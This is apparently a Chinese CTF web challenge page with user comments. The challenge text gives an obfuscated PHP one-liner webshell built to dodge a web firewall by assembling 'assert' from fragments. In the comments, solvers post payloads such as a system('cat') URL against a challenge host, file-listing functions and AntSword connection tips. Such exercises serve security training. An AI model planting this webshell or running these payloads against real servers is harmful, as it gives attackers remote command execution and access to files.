shellWEB 未解决

分数: 25 金币: 3
题目作者: harry
一  血: dotast
一血奖励: 1金币
解  决: 7921
提  示:
描  述:
送给大家一个过狗一句话 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s'])
评论
mantou 4年前

http://114.67.246.176:18711/?s=system(%22cat%20xxxxxxxx.txt%22)

回复 0

Y1rannn 4年前

...没那么复杂啊,我直接s=system("")

回复 3

pest 4年前

除了菜刀,还可以利用print_r(glob("*.*")) scandir() //作用能扫描文件夹下的目录和文件,返回值为所有文件名组成的一个数组 show_source() //显示文件源码 highlight_file() //和show_source()函数是一个意思 我直接复制的一个大佬的wp过来的。

回复 0

simpleboy 4年前

解法还是很多的

回复 0

simpleboy 4年前

命令执行了

回复 0

三分踯躅 4年前

哇,真的有那么复杂吗,蚁剑都整上了,难道是我用assert命令执行的姿势太low了吗

回复 0

GGBond9527 4年前

assert()代码执行漏洞

回复 1

xiaotan451 4年前

我是肖彪

回复 3
xiaotan451 4年前

@biaoxiao 我是流汗了

回复 0

biaoxiao 4年前

嗯 你说得对

回复 0

kaibaking 4年前

兄弟们,为什么我蚁剑连接数据为空,/index.php 连接密码s ?? 还是说不需要连接蚁剑?

回复 0
som3bady 4年前

他要求是get

回复 0

tzzzez 5年前

payload构建,蚁剑连接

回复 0
Retro 4年前

@ypp110 蚁剑似乎不能用get连,直接url里输吧

回复 0

ypp110 4年前

能否详细说下怎么用蚁剑连接

回复 1

WriteUp

image
harry

3 金币

评分(10)

解题动态

aixuexi666 攻破了该题 2小时前
57 攻破了该题 4小时前
Thompson 攻破了该题 8小时前
song1997 攻破了该题 8小时前
zzz12311 攻破了该题 9小时前
yonge 攻破了该题 13小时前
ruirui102 攻破了该题 14小时前
祥子1 攻破了该题 14小时前
mixiu 攻破了该题 14小时前
tz001 攻破了该题 15小时前
Seb 攻破了该题 15小时前
迷宫 攻破了该题 16小时前
Cooper.juice 攻破了该题 1天前
SXWM 攻破了该题 1天前
Erec 攻破了该题 1天前
Frenemy 攻破了该题 1天前
hsk_zy 攻破了该题 1天前
谢特恒123 攻破了该题 1天前
admincon 攻破了该题 1天前
muyi111 攻破了该题 1天前
问题反馈